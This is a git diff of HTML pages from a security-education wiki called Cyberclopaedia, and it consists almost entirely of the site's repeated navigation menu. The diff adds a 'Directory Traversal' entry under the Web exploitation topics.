        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -322,22 +322,6 @@

Optional Head - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/Relocations.html b/docs/Reverse Engineering/Binary Formats/PE/Relocations.html index f1c14e3d..4d4c62a0 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/Relocations.html +++ b/docs/Reverse Engineering/Binary Formats/PE/Relocations.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -191,22 +191,6 @@

The - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/Sections.html b/docs/Reverse Engineering/Binary Formats/PE/Sections.html index 0360ddbf..bdfe6ca6 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/Sections.html +++ b/docs/Reverse Engineering/Binary Formats/PE/Sections.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -253,22 +253,6 @@

Data Direct - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/The DOS Header.html b/docs/Reverse Engineering/Binary Formats/PE/The DOS Header.html index 50c2894e..ab23a7fd 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/The DOS Header.html +++ b/docs/Reverse Engineering/Binary Formats/PE/The DOS Header.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
